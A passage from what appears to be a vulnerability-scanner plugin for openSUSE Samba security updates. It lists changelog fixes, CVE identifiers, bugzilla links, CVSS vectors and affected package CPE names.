connect_to_domain_password_server(); (bso#11367).\n\n - ncacn_http: Fix GNUism; (bso#11371).\n\n - Backport changes to use resource group sids obtained\n from pac logon_info; (bso#11328); (boo#912457).\n\n - Order winbind.service Before and Want nss-user-lookup\n target.\n\n - s3:smbXsrv: refactor duplicate code into\n smbXsrv_session_clear_and_logoff(); (bso#11182).\n\n - gencache: don't fail gencache_stabilize if there were\n records to delete; (bso#11260).\n\n - s3: libsmbclient: After getting attribute server, ensure\n main srv pointer is still valid; (bso#11186).\n\n - s4: rpc: Refactor dcesrv_alter() function into setup and\n send steps; (bso#11236).\n\n - s3: smbd: Incorrect file size returned in the response\n of 'FILE_SUPERSEDE Create'; (bso#11240).\n\n - Mangled names do not work with acl_xattr; (bso#11249).\n\n - nmbd rewrites browse.dat when not required; (bso#11254).\n\n - vfs_fruit: add option 'nfs_aces' that controls the NFS\n ACEs stuff; (bso#11213).\n\n - s3:smbd: Add missing tevent_req_nterror; (bso#11224).\n\n - vfs: kernel_flock and named streams; (bso#11243).\n\n - vfs_gpfs: Error code path doesn't call END_PROFILE;\n (bso#11244).\n\n - s4: libcli/finddcs_cldap: continue processing CLDAP\n until all addresses are used; (bso#11284).\n\n - ctdb: check for talloc_asprintf() failure; (bso#11201).\n\n - spoolss: purge the printer name cache on name change;\n (bso#11210); (boo#901813).\n\n - CTDB statd-callout does not scale; (bso#11204).\n\n - vfs_fruit: also map characters below 0x20; (bso#11221).\n\n - ctdb: Coverity fix for CID 1291643; (bso#11201).\n\n - Multiplexed RPC connections are not handled by DCERPC\n server; (bso#11225).\n\n - Fix terminate connection behavior for asynchronous\n endpoint with PUSH notification flavors; (bso#11226).\n\n - ctdb-scripts: Fix bashism in ctdbd_wrapper script;\n (bso#11007).\n\n - ctdb: Fix CIDs 1125615, 1125634, 1125613, 1288201 and\n 1125553; (bso#11201).\n\n - SMB2 should cancel pending NOTIFY calls with\n DELETE_PENDING if the directory is deleted; (bso#11257).\n\n - s3:winbindd: make sure we remove pending io requests\n before closing client\n\n - 'sharesec' output no longer matches input format;\n (bso#11237).\n\n - waf: Fix systemd detection; (bso#11200).\n\n - CTDB: Fix portability issues; (bso#11202).\n\n - CTDB: Fix some IPv6-related issues; (bso#11203).\n\n - CTDB statd-callout does not scale; (bso#11204).\n\n - 'net ads dns gethostbyname' crashes with an error in\n TALLOC_FREE if you enter invalid values; (bso#11234).\n\n - libads: record service ticket endtime for sealed ldap\n connections;\n\n - lib/util: Include DEBUG macro in internal header files\n before samba_util.h; (bso#11033).\n\n - Initialize dwFlags field of DNS_RPC_NODE structure;\n (bso#9791).\n\n - s3: lib: ntlmssp: If NTLMSSP_NEGOTIATE_TARGET_INFO isn't\n set, cope with servers that don't send the 2 unused\n fields; (bso#10016).\n\n - build:wafadmin: Fix use of spaces instead of tabs;\n (bso#10476).\n\n - waf: Fix the build on openbsd; (bso#10476).\n\n - s3: client: 'client use spnego principal = yes' code\n checks wrong name;\n\n - spoolss: Retrieve published printer GUID if not in\n registry; (bso#11018).\n\n - vfs_fruit: Enhance handling of malformed AppleDouble\n files; (bso#11125).\n\n - backupkey: Explicitly link to gnutls and gcrypt;\n (bso#11135).\n\n - replace: Remove superfluous check for gcrypt header;\n (bso#11135).\n\n - Backport subunit changes; (bso#11137).\n\n - libcli/auth: Match Declaration of\n netlogon_creds_cli_context_tmp with implementation;\n (bso#11140).\n\n - s3-winbind: Fix cached user group lookup of trusted\n domains; (bso#11143).\n\n - talloc: Version 2.1.2; (bso#11144).\n\n - Update libwbclient version to 0.12; (bso#11149).\n\n - brlock: Use 0 instead of empty initializer list;\n (bso#11153).\n\n - s4:auth/gensec_gssapi: Let gensec_gssapi_update() return\n\n - backupkey: Use ndr_pull_struct_blob_all(); (bso#11174).\n\n - Fix lots of winbindd zombie processes on Solaris\n platform; (bso#11175).\n\n - Prevent samba package updates from disabling samba\n kerberos printing.\n\n - Add sparse file support for samba; (fate#318424).\n\n - Simplify libxslt build requirement and README.SUSE\n install.\n\n - Remove no longer required cleanup steps while populating\n the build root.\n\n - smbd: Stop using vfs_Chdir after SMB_VFS_DISCONNECT;\n (bso#1115).\n\n - pam_winbind: fix warn_pwd_expire implementation;\n (bso#9056).\n\n - nsswitch: Fix soname of linux nss_*.so.2 modules;\n (bso#9299).\n\n - Make 'profiles' work again; (bso#9629).\n\n - s3:smb2_server: protect against integer wrap with 'smb2\n max credits = 65535'; (bso#9702).\n\n - Make validate_ldb of String(Generalized-Time) accept\n millisecond format '.000Z'; (bso#9810).\n\n - Use -R linker flag on Solaris, not -rpath; (bso#10112).\n\n - vfs: Add glusterfs manpage; (bso#10240).\n\n - Make 'smbclient' use cached creds; (bso#10279).\n\n - pdb: Fix build issues with shared modules; (bso#10355).\n\n - s4-dns: Add support for BIND 9.10; (bso#10620).\n\n - idmap: Return the correct id type to *id_to_sid methods;\n (bso#10720).\n\n - printing/cups: Pack requested-attributes with\n IPP_TAG_KEYWORD; (bso#10808).\n\n - Don't build vfs_snapper on FreeBSD; (bso#10834).\n\n - nss_winbind: Add getgroupmembership for FreeBSD;\n (bso#10835).\n\n - idmap_rfc2307: Fix a crash after connection problem to\n DC; (bso#10837).\n\n - s3: smb2cli: query info return length check was\n reversed; (bso#10848).\n\n - s3: lib, s3: modules: Fix compilation on Solaris;\n (bso#10849).\n\n - lib: uid_wrapper: Fix setgroups and syscall detection on\n a system without native uid_wrapper library;\n (bso#10851).\n\n - winbind3: Fix pwent variable substitution; (bso#10852).\n\n - Improve samba-regedit; (bso#10859).\n\n - registry: Don't leave dangling transactions;\n (bso#10860).\n\n - Fix build of socket_wrapper on systems without\n SO_PROTOCOL; (bso#10861).\n\n - build: Do not install 'texpect' binary anymore;\n (bso#10862).\n\n - Fix testparm to show hidden share defaults; (bso#10864).\n\n - libcli/smb: Fix smb2cli_validate_negotiate_info with\n min=PROTOCOL_NT1 max=PROTOCOL_SMB2_02; (bso#10866).\n\n - Integrate CTDB into top-level Samba build; (bso#10892).\n\n - samba-tool group add: Add option '--nis-domain' and\n '--gid'; (bso#10895).\n\n - s3-nmbd: Fix netbios name truncation; (bso#10896).\n\n - spoolss: Fix handling of bad EnumJobs levels;\n (bso#10898).\n\n - Fix smbclient loops doing a directory listing against\n Mac OS X 10 server with a non-wildcard path;\n (bso#10904).\n\n - Fix print job enumeration; (bso#10905); (boo#898031).\n\n - samba-tool: Create NIS enabled users and\n unixHomeDirectory attribute; (bso#10909).\n\n - Add support for SMB2 leases; (bso#10911).\n\n - btrfs: Don't leak opened directory handle; (bso#10918).\n\n - s3: nmbd: Ensure NetBIOS names are only 15 characters\n stored; (bso#10920).\n\n - s3:smbd: Fix file corruption using 'write cache size !=\n 0'; (bso#10921).\n\n - pdb_tdb: Fix a TALLOC/SAFE_FREE mixup; (bso#10932).\n\n - s3-keytab: fix keytab array NULL termination;\n (bso#10933).\n\n - s3:passdb: fix logic in pdb_set_pw_history();\n (bso#10940).\n\n - Cleanup add_string_to_array and usage; (bso#10942).\n\n - dbwrap_ctdb: Pass on mutex flags to tdb_open;\n (bso#10942).\n\n - Fix RootDSE search with extended dn control;\n (bso#10949).\n\n - Fix 'samba-tool dns serverinfo <server>' for IPv6;\n (bso#10952).\n\n - libcli/smb: only force signing of smb2 session setups\n when binding a new session; (bso#10958).\n\n - s3-smbclient: Return success if we listed the shares;\n (bso#10960).\n\n - s3-smbstatus: Fix exit code of profile output;\n (bso#10961).\n\n - socket_wrapper: Add missing prototype check for eventfd;\n (bso#10965).\n\n - libcli: SMB2: Pure SMB2-only negprot fix to make us\n behave as a Windows client does; (bso#10966).\n\n - vfs_streams_xattr: Check stream type; (bso#10971).\n\n - s3: smbd: Fix *allocate* calls to follow POSIX error\n return convention; (bso#10982).\n\n - vfs_fruit: Add support for AAPL; (bso#10983).\n\n - Fix spoolss IDL response marshalling when returning\n error without clearing info; (bso#10984).\n\n - dsdb-samldb: Check for extended access rights before we\n allow changes to userAccountControl; (bso#10993);\n CVE-2014-8143; (boo#914279).\n\n - Fix IPv6 support in CTDB; (bso#10996).\n\n - ctdb-daemon: Use correct tdb flags when enabling robust\n mutex support; (bso#11000).\n\n - vfs_streams_xattr: Add missing call to\n SMB_VFS_NEXT_CONNECT; (bso#11005).\n\n - s3-util: Fix authentication with long hostnames;\n (bso#11008).\n\n - ctdb-build: Fix build without xsltproc; (bso#11014).\n\n - packaging: Include CTDB man pages in the tarball;\n (bso#11014).\n\n - pdb_get_trusteddom_pw() fails with non valid UTF16\n random passwords; (bso#11016).\n\n - Make Sharepoint search show user documents; (bso#11022).\n\n - nss_wrapper: check for nss.h; (bso#11026).\n\n - Enable mutexes in gencache_notrans.tdb; (bso#11032).\n\n - tdb_wrap: Make mutexes easier to use; (bso#11032).\n\n - lib/util: Avoid collision which alread defined consumer\n DEBUG macro; (bso#11033).\n\n - winbind: Retry after SESSION_EXPIRED error in ping-dc;\n (bso#11034).\n\n - s3-libads: Fix a possible segfault in\n kerberos_fetch_pac(); (bso#11037).\n\n - vfs_fruit: Fix base_fsp name conversion; (bso#11039).\n\n - vfs_fruit: mmap under FreeBSD needs PROT_READ;\n (bso#11040).\n\n - Fix authentication using Kerberos (not AD); (bso#11044).\n\n - net: Fix sam addgroupmem; (bso#11051).\n\n - vfs_snapper: Correctly handles multi-byte DBus strings;\n (bso#11055); (boo#913238).\n\n - cli_connect_nb_send: Don't segfault on host == NULL;\n (bso#11058).\n\n - utils: Fix 'net time' segfault; (bso#11058).\n\n - libsmb: Provide authinfo domain for encrypted session\n referrals; (bso#11059).\n\n - s3-pam_smbpass: Fix memory leak in\n pam_sm_authenticate(); (bso#11066).\n\n - vfs_glusterfs: Add comments to the pipe(2) code;\n (bso#11069).\n\n - vfs/glusterfs: Change xattr key to match gluster key;\n (bso#11069).\n\n - vfs_glusterfs: Implement AIO support; (bso#11069).\n\n - s3-vfs: Fix developer build of vfs_ceph module;\n (bso#11070).\n\n - s3: netlogon: Ensure we don't call talloc_free on an\n uninitialized pointer; (bso#11077); CVE-2015-0240;\n (boo#917376).\n\n - vfs: Add a brief vfs_ceph manpage; (bso#11088).\n\n - s3: smbclient: Allinfo leaves the file handle open;\n (bso#11094).\n\n - Fix Win8.1 Credentials Manager issue after KB2992611 on\n Samba domain; (bso#11097).\n\n - debug: Set close-on-exec for the main log file FD;\n (bso#11100).\n\n - s3: smbd: leases - losen paranoia check. Stat opens can\n grant leases; (bso#11102).\n\n - s3: smbd: SMB2 close. If a file has delete on close,\n store the return info before deleting; (bso#11104).\n\n - doc:man:vfs_glusterfs: improve the configuration\n section; (bso#11117).\n\n - snprintf: Try to support %j; (bso#11119).\n\n - ctdb-io: Do not use sys_write to write to client\n sockets; (bso#11124).\n\n - doc-xml: Add 'sharesec' reference to 'access based share\n enum'; (bso#11127).\n\n - Fix usage of freed memory on server exit; (bso#11218);\n (boo#919309).\n\n - Adjust baselibs.conf due to libpdb0 package rename to\n libsamba-passdb0.\n\n - Add libsamba-debug, libsocket-blocking,\n libsamba-cluster-support, and libhttp to the libs\n package; (boo#913547).\n\n - Rebase File Server Remote VSS Protocol (FSRVP) server\n against 4.2.0rc1; (fate#313346).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=901813\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=912457\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=913238\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=913547\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=914279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=917376\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=919309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=924519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=936862\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=942716\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=946051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=947552\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=949022\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958581\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958582\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958583\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958584\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958585\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958586\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=964023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966271\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968222\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971965\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=972197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973033\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973036\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973832\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=974629\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n 